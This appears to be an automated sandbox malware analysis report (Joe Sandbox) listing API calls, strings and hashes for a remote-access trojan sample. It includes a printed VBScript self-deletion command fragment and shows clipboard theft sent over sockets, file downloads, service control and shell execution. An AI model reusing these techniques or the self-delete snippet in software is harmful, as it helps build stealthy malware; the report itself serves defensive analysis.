                                                                                                • __EH_prolog.LIBCMT ref: 00419F07
                                                                                                • GdiplusStartup.GDIPLUS(00474ACC,?,00000000), ref: 00419F39
                                                                                                • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,0000001A,00000019), ref: 00419FC5
                                                                                                • Sleep.KERNEL32(000003E8), ref: 0041A04B
                                                                                                • GetLocalTime.KERNEL32(?), ref: 0041A053
                                                                                                • Sleep.KERNEL32(00000000,00000018,00000000), ref: 0041A142
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Sleep$CreateDirectoryGdiplusH_prologLocalStartupTime
                                                                                                • String ID: time_%04i%02i%02i_%02i%02i%02i$wnd_%04i%02i%02i_%02i%02i%02i$PG$PG$PG
                                                                                                • API String ID: 489098229-1431523004
                                                                                                • Opcode ID: a8da52c30f34f733819d3fb30956e5b9677740672e8e7ea6aee02b6146ebfe0e
                                                                                                • Instruction ID: 53b10142388d6e618379421ea863975f0427ee42951a241e26dd10475b989a70
                                                                                                • Opcode Fuzzy Hash: a8da52c30f34f733819d3fb30956e5b9677740672e8e7ea6aee02b6146ebfe0e
                                                                                                • Instruction Fuzzy Hash: 75517D70A00215AACB14BBB5C8569FD7B69AF44308F40403FF509AB1E2EF7C9D85C799
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                  • Part of subcall function 0041279E: TerminateProcess.KERNEL32(00000000,pth_unenc,0040F816), ref: 004127AE
                                                                                                  • Part of subcall function 0041279E: WaitForSingleObject.KERNEL32(000000FF), ref: 004127C1
                                                                                                  • Part of subcall function 00413646: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,00000000,004752F0), ref: 00413662
                                                                                                  • Part of subcall function 00413646: RegQueryValueExA.KERNEL32(00000000,00000000,00000000,00000000,00000208,?), ref: 0041367B
                                                                                                  • Part of subcall function 00413646: RegCloseKey.KERNEL32(00000000), ref: 00413686
                                                                                                • GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 0040D7A7
                                                                                                • ShellExecuteW.SHELL32(00000000,open,00000000,00466468,00466468,00000000), ref: 0040D906
                                                                                                • ExitProcess.KERNEL32 ref: 0040D912
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Process$CloseExecuteExitFileModuleNameObjectOpenQueryShellSingleTerminateValueWait
                                                                                                • String ID: """, 0$.vbs$8SG$CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)$CreateObject("WScript.Shell").Run "cmd /c ""$Temp$exepath$open
                                                                                                • API String ID: 1913171305-3159800282
                                                                                                • Opcode ID: 6f600e62e7459217c9cc1041d556212d7b75326f8bcfb9aedaa3be0501c90c64
                                                                                                • Instruction ID: c4a317b5347046847bfe7fc55b5e2b024c4a0365841bea6b80e5cdcb83cecef3
                                                                                                • Opcode Fuzzy Hash: 6f600e62e7459217c9cc1041d556212d7b75326f8bcfb9aedaa3be0501c90c64
                                                                                                • Instruction Fuzzy Hash: 374129719001196ACB15FA62DC56DEEB778AF50709F10007FB106B31E2FF785E8ACA98
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: _free
                                                                                                • String ID:
                                                                                                • API String ID: 269201875-0
                                                                                                • Opcode ID: 150d02efb69288e28b538d13911ced70cd88637e204aac801fa1dbe9debde128
                                                                                                • Instruction ID: 19307f6e3054a2b86938e0910b3516461ca86888dd331947a388e70c702e76ea
                                                                                                • Opcode Fuzzy Hash: 150d02efb69288e28b538d13911ced70cd88637e204aac801fa1dbe9debde128
                                                                                                • Instruction Fuzzy Hash: 6CC17675D00208AFDB20DBA8CC82FDE77F89B09745F154156FE04FB287D67499458B98
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E38
                                                                                                • SetEvent.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E43
                                                                                                • CloseHandle.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E4C
                                                                                                • closesocket.WS2_32(000000FF), ref: 00404E5A
                                                                                                • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E91
                                                                                                • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00404EA2
                                                                                                • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00404EA9
                                                                                                • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404EBA
                                                                                                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404EBF
                                                                                                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404EC4
                                                                                                • SetEvent.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404ED1
                                                                                                • CloseHandle.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404ED6
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CloseEventHandle$ObjectSingleWait$closesocket
                                                                                                • String ID:
                                                                                                • API String ID: 3658366068-0
                                                                                                • Opcode ID: ea79b75f1ae65c935e1138fe974f2fff21a9703030cabbfa4cd42eb945bff9c9
                                                                                                • Instruction ID: 36cd0b6e7e722fc311c13f4f3d89471b6fda53dcd65266afdd9727349a39dcbc
                                                                                                • Opcode Fuzzy Hash: ea79b75f1ae65c935e1138fe974f2fff21a9703030cabbfa4cd42eb945bff9c9
                                                                                                • Instruction Fuzzy Hash: F821EA71104B04AFDB316B26DC49B1BBBA1FF40326F104A2DE2E211AF1CB75B851DB58
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                  • Part of subcall function 00CCE379: CreateFileW.KERNEL32(00000000,00000000,?,00CCE769,?,?,00000000,?,00CCE769,00000000,0000000C), ref: 00CCE396
                                                                                                • GetLastError.KERNEL32 ref: 00CCE7D4
                                                                                                • __dosmaperr.LIBCMT ref: 00CCE7DB
                                                                                                • GetFileType.KERNEL32(00000000), ref: 00CCE7E7
                                                                                                • GetLastError.KERNEL32 ref: 00CCE7F1
                                                                                                • __dosmaperr.LIBCMT ref: 00CCE7FA
                                                                                                • CloseHandle.KERNEL32(00000000), ref: 00CCE81A
                                                                                                • CloseHandle.KERNEL32(00CC87EE), ref: 00CCE967
                                                                                                • GetLastError.KERNEL32 ref: 00CCE999
                                                                                                • __dosmaperr.LIBCMT ref: 00CCE9A0
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1399136242.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                                                • Associated: 00000002.00000002.1399130212.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.1399143689.0000000000CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.1399149844.0000000000CE3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.1399155708.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.1399162146.0000000000CEA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_cb0000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                                                                • String ID: H
                                                                                                • API String ID: 4237864984-2852464175
                                                                                                • Opcode ID: a3a743773de4d99e8da291dd90709406559296910eee75821370d29fc13f919e
                                                                                                • Instruction ID: 40853db1ac23a7b6485b861393f4532e65754350f899ad157d71ea9d4965f16c
                                                                                                • Opcode Fuzzy Hash: a3a743773de4d99e8da291dd90709406559296910eee75821370d29fc13f919e
                                                                                                • Instruction Fuzzy Hash: 38A10432A041589FCF19AF68DC92FAE3BA1AB07320F18015DF811AF3E2D7359952DB51
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                  • Part of subcall function 004557EA: CreateFileW.KERNEL32(00000000,00000000,?,00455BC5,?,?,00000000,?,00455BC5,00000000,0000000C), ref: 00455807
                                                                                                • GetLastError.KERNEL32 ref: 00455C30
                                                                                                • __dosmaperr.LIBCMT ref: 00455C37
                                                                                                • GetFileType.KERNEL32(00000000), ref: 00455C43
                                                                                                • GetLastError.KERNEL32 ref: 00455C4D
                                                                                                • __dosmaperr.LIBCMT ref: 00455C56
                                                                                                • CloseHandle.KERNEL32(00000000), ref: 00455C76
                                                                                                • CloseHandle.KERNEL32(?), ref: 00455DC0
                                                                                                • GetLastError.KERNEL32 ref: 00455DF2
                                                                                                • __dosmaperr.LIBCMT ref: 00455DF9
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                                                                • String ID: H
                                                                                                • API String ID: 4237864984-2852464175
                                                                                                • Opcode ID: 399b877e36de6a5c117d04748259f3f5ee8ff48d0ba2fa8d85c55bfe295cd247
                                                                                                • Instruction ID: 56c3c6f7ff717df319bbbb51fb2fc9f7fa86c8cd8c14b94b2a1c43a0bf66d1dd
                                                                                                • Opcode Fuzzy Hash: 399b877e36de6a5c117d04748259f3f5ee8ff48d0ba2fa8d85c55bfe295cd247
                                                                                                • Instruction Fuzzy Hash: B4A14632A106049FDF19AF68DC617BE7BA0EB06325F14015EEC11EB392D7399C16CB59
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: _free
                                                                                                • String ID: \&G$\&G$`&G
                                                                                                • API String ID: 269201875-253610517
                                                                                                • Opcode ID: 51886c83d460ca1f1e6488eae7f609bd221569302eddb2c6de307cc91536e8c9
                                                                                                • Instruction ID: 997e24f70132231b6ca759a19b47624983911e3be9dffde99cd9162d123c0bc6
                                                                                                • Opcode Fuzzy Hash: 51886c83d460ca1f1e6488eae7f609bd221569302eddb2c6de307cc91536e8c9
                                                                                                • Instruction Fuzzy Hash: 7C610375900205AFDB20CFA9C842BAABBF4EF09315F24416BED44EB342D774AD45CB58
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: 65535$udp
                                                                                                • API String ID: 0-1267037602
                                                                                                • Opcode ID: 5dd592201d8a346242394efb96da626efb11898a272192137d190e0d426a4b06
                                                                                                • Instruction ID: 82029065c0b78db9351da75f496251e2fcb37d529d8e3b0a8074ff1270b1487a
                                                                                                • Opcode Fuzzy Hash: 5dd592201d8a346242394efb96da626efb11898a272192137d190e0d426a4b06
                                                                                                • Instruction Fuzzy Hash: 2D51CD7120A301ABD3209A68C909BBB77A4AFC4750F05052FF88697391F66DDCC196AE
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A7D2
                                                                                                • GetLastError.KERNEL32(?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A7DF
                                                                                                • __dosmaperr.LIBCMT ref: 0043A7E6
                                                                                                • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A812
                                                                                                • GetLastError.KERNEL32(?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A81C
                                                                                                • __dosmaperr.LIBCMT ref: 0043A823
                                                                                                • WideCharToMultiByte.KERNEL32(?,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,?,?,?,?,?,00401D55,?), ref: 0043A866
                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A870
                                                                                                • __dosmaperr.LIBCMT ref: 0043A877
                                                                                                • _free.LIBCMT ref: 0043A883
                                                                                                • _free.LIBCMT ref: 0043A88A
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ByteCharErrorLastMultiWide__dosmaperr$_free
                                                                                                • String ID:
                                                                                                • API String ID: 2441525078-0
                                                                                                • Opcode ID: 323ed2088c2585d4f5ed1c6d124068b85cad53423d8da8c927901c3b3984bd57
                                                                                                • Instruction ID: 7a249d13fa055752909bc64b4bd8998278545b645867af894ce57546f5e9ab17
                                                                                                • Opcode Fuzzy Hash: 323ed2088c2585d4f5ed1c6d124068b85cad53423d8da8c927901c3b3984bd57
                                                                                                • Instruction Fuzzy Hash: 3C31B071804209BBDF15AFA5CC45CAF3B7CEF09364F10012AF950562A1DB39CD61DBAA
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • SetEvent.KERNEL32(?,?), ref: 004054BF
                                                                                                • GetMessageA.USER32 ref: 0040556F
                                                                                                • TranslateMessage.USER32(?), ref: 0040557E
                                                                                                • DispatchMessageA.USER32 ref: 00405589
                                                                                                • HeapCreate.KERNEL32(00000000,00000000,00000000,00000074,00474F78), ref: 00405641
                                                                                                • HeapFree.KERNEL32(00000000,00000000,0000003B,0000003B,?,00000000), ref: 00405679
                                                                                                  • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Message$Heap$CreateDispatchEventFreeTranslatesend
                                                                                                • String ID: CloseChat$DisplayMessage$GetMessage
                                                                                                • API String ID: 2956720200-749203953
                                                                                                • Opcode ID: 86fea375002ccb003de664864008f382d6ba5836bfb0b35838b0b24901e3f6df
                                                                                                • Instruction ID: fac30f2e37e154151ba5f09932d78796b5672d7f7f1631b14e77a4da00ed4c1d
                                                                                                • Opcode Fuzzy Hash: 86fea375002ccb003de664864008f382d6ba5836bfb0b35838b0b24901e3f6df
                                                                                                • Instruction Fuzzy Hash: 7541B271604301ABCB14FB75DC5A86F37A9AB85744F40093EF916A36E1EF3C8905CB9A
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                  • Part of subcall function 00417E7A: __EH_prolog.LIBCMT ref: 00417E7F
                                                                                                • WaitForSingleObject.KERNEL32(00000000,000000FF,00000070,004660A4), ref: 00417D2A
                                                                                                • CloseHandle.KERNEL32(00000000), ref: 00417D33
                                                                                                • DeleteFileA.KERNEL32(00000000), ref: 00417D42
                                                                                                • ShellExecuteExA.SHELL32(0000003C,00000000,00000010,?,?,?), ref: 00417CF6
                                                                                                  • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CloseDeleteExecuteFileH_prologHandleObjectShellSingleWaitsend
                                                                                                • String ID: 0VG$0VG$<$@$Temp
                                                                                                • API String ID: 1704390241-2575729100
                                                                                                • Opcode ID: 884926dbc2f4342c3e31fd48ea0137ae5da3e9f8417a43bc9c6e092cb74613ae
                                                                                                • Instruction ID: 743bab563fa925c91e9bd11877dc29bb9b78fb67e5c7396ab49355918e86c52c
                                                                                                • Opcode Fuzzy Hash: 884926dbc2f4342c3e31fd48ea0137ae5da3e9f8417a43bc9c6e092cb74613ae
                                                                                                • Instruction Fuzzy Hash: 53415C319002099ACB14FB62DC56AFE7775AF10308F5041BEF506761E2EF7D1A8ACB99
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • OpenClipboard.USER32 ref: 0041688F
                                                                                                • EmptyClipboard.USER32 ref: 0041689D
                                                                                                • CloseClipboard.USER32 ref: 004168A3
                                                                                                • OpenClipboard.USER32 ref: 004168AA
                                                                                                • GetClipboardData.USER32 ref: 004168BA
                                                                                                • GlobalLock.KERNEL32 ref: 004168C3
                                                                                                • GlobalUnlock.KERNEL32(00000000), ref: 004168CC
                                                                                                • CloseClipboard.USER32 ref: 004168D2
                                                                                                  • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Clipboard$CloseGlobalOpen$DataEmptyLockUnlocksend
                                                                                                • String ID: !D@
                                                                                                • API String ID: 2172192267-604454484
                                                                                                • Opcode ID: da6010ac61b110ab4bf06f7ba957bd9646f5f8c854801cc467739b1a1e98d4e3
                                                                                                • Instruction ID: 129740f40504877be21c885bea0291386d0f791e208c218662832cd19edc281c
                                                                                                • Opcode Fuzzy Hash: da6010ac61b110ab4bf06f7ba957bd9646f5f8c854801cc467739b1a1e98d4e3
                                                                                                • Instruction Fuzzy Hash: CA012971204300DBC714AB72AC59AAE77A5AF84742F40047EF94A961E2EF38CC45CA69
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00CB70B6
                                                                                                • InternetOpenA.WININET(00CDFE4B,00000000,00000000,00000000,00000000), ref: 00CB70CC
                                                                                                • InternetOpenUrlA.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 00CB70EC
                                                                                                • InternetReadFile.WININET(00000000,00000000,00004000,00004000), ref: 00CB70FD
                                                                                                • WriteFile.KERNEL32(?,00000000,00004000,?,00000000), ref: 00CB7122
                                                                                                • InternetReadFile.WININET(00000000,00000000,00004000,00004000), ref: 00CB712D
                                                                                                • CloseHandle.KERNEL32(?), ref: 00CB713F
                                                                                                • InternetCloseHandle.WININET(?), ref: 00CB714E
                                                                                                • InternetCloseHandle.WININET(00000000), ref: 00CB7151
                                                                                                • RemoveDirectoryA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00CB7303
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1399136242.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                                                • Associated: 00000002.00000002.1399130212.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.1399143689.0000000000CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.1399149844.0000000000CE3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.1399155708.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.1399162146.0000000000CEA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_cb0000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Internet$File$CloseHandle$OpenRead$CreateDirectoryRemoveWrite
                                                                                                • String ID:
                                                                                                • API String ID: 1496009958-0
                                                                                                • Opcode ID: fa5b74e47455d10b6c4afef16b7ab0a5913a211699b6e4db50dcc70505ef00de
                                                                                                • Instruction ID: 77dfc9cd9f57dda0a11b7278badc859bdec08c77ab1f37ecd745a1463b1049ab
                                                                                                • Opcode Fuzzy Hash: fa5b74e47455d10b6c4afef16b7ab0a5913a211699b6e4db50dcc70505ef00de
                                                                                                • Instruction Fuzzy Hash: F1A1AC71A00208ABEB18CFA4DC85FED77B5AB89304F20421DFD55A72E1D735EA819B61
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • CreateFileMappingW.KERNEL32(?,00000000,00000002,00000000,00000000,00000000), ref: 00413365
                                                                                                • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 00413373
                                                                                                • GetFileSize.KERNEL32(?,00000000), ref: 00413380
                                                                                                • UnmapViewOfFile.KERNEL32(00000000), ref: 004133A0
                                                                                                • CloseHandle.KERNEL32(00000000), ref: 004133AD
                                                                                                • CloseHandle.KERNEL32(?), ref: 004133B3
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: File$CloseHandleView$CreateMappingSizeUnmap
                                                                                                • String ID:
                                                                                                • API String ID: 297527592-0
                                                                                                • Opcode ID: 54d0a7ceb6156b179c4d4b70ecf7ac426438401b13d8ed2bf61df12e179022dc
                                                                                                • Instruction ID: 5c5bf2d68fde417aed129774ee901704837dfcc31a9725c6dfb724aa407e88ba
                                                                                                • Opcode Fuzzy Hash: 54d0a7ceb6156b179c4d4b70ecf7ac426438401b13d8ed2bf61df12e179022dc
                                                                                                • Instruction Fuzzy Hash: 9B41E631104305BBE720AF65DC4AFAB7BACEF89725F10052EF655D1191DB38DA40C66E
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1399136242.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                                                • Associated: 00000002.00000002.1399130212.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.1399143689.0000000000CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.1399149844.0000000000CE3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.1399155708.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.1399162146.0000000000CEA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_cb0000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: _free$ErrorFreeHeapLast
                                                                                                • String ID:
                                                                                                • API String ID: 776569668-0
                                                                                                • Opcode ID: 9c6d7bb66b4b8a31ef1751ec185bb79328e650d91c8168b94c70f2f3d7daf3f8
                                                                                                • Instruction ID: 1595a64828e0de5bea215e236ccc12a1f524a7be4050d2f9327b5a4038e3a527
                                                                                                • Opcode Fuzzy Hash: 9c6d7bb66b4b8a31ef1751ec185bb79328e650d91c8168b94c70f2f3d7daf3f8
                                                                                                • Instruction Fuzzy Hash: D321FC76904109BFCB01EF94C895EDE7BB9FF08340F00466AF9199B161DB31DA48DB81
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • OpenSCManagerW.ADVAPI32(00000000,00000000,00000011,00000000,00000001,?,?,?,?,?,?,0041A3D4,00000000), ref: 0041AA6A
                                                                                                • OpenServiceW.ADVAPI32(00000000,00000000,000F003F,?,?,?,?,?,?,0041A3D4,00000000), ref: 0041AA81
                                                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A3D4,00000000), ref: 0041AA8E
                                                                                                • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,0041A3D4,00000000), ref: 0041AA9D
                                                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A3D4,00000000), ref: 0041AAAE
                                                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A3D4,00000000), ref: 0041AAB1
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Service$CloseHandle$Open$ControlManager
                                                                                                • String ID:
                                                                                                • API String ID: 221034970-0
                                                                                                • Opcode ID: a617342fd7d0ab3f36a6b4bf1726268dedbc23e606f349c661561497bbda8e31
                                                                                                • Instruction ID: c2f3bd219c20ba15e3fc912c542e610d52f6c467f259bd4982bc279ce16e436d
                                                                                                • Opcode Fuzzy Hash: a617342fd7d0ab3f36a6b4bf1726268dedbc23e606f349c661561497bbda8e31
                                                                                                • Instruction Fuzzy Hash: E211A931941318AFD711AF64DC85DFF3B6CDF45BA6B000026F90592191DB688D46EABA
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • _free.LIBCMT ref: 00447FF5
                                                                                                  • Part of subcall function 00446642: RtlFreeHeap.NTDLL(00000000,00000000,?,00450BB0,?,00000000,?,00000000,?,00450E54,?,00000007,?,?,0045139F,?), ref: 00446658
                                                                                                  • Part of subcall function 00446642: GetLastError.KERNEL32(?,?,00450BB0,?,00000000,?,00000000,?,00450E54,?,00000007,?,?,0045139F,?,?), ref: 0044666A
                                                                                                • _free.LIBCMT ref: 00448001
                                                                                                • _free.LIBCMT ref: 0044800C
                                                                                                • _free.LIBCMT ref: 00448017
                                                                                                • _free.LIBCMT ref: 00448022
                                                                                                • _free.LIBCMT ref: 0044802D
                                                                                                • _free.LIBCMT ref: 00448038
                                                                                                • _free.LIBCMT ref: 00448043
                                                                                                • _free.LIBCMT ref: 0044804E
                                                                                                • _free.LIBCMT ref: 0044805C
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: _free$ErrorFreeHeapLast
                                                                                                • String ID:
                                                                                                • API String ID: 776569668-0
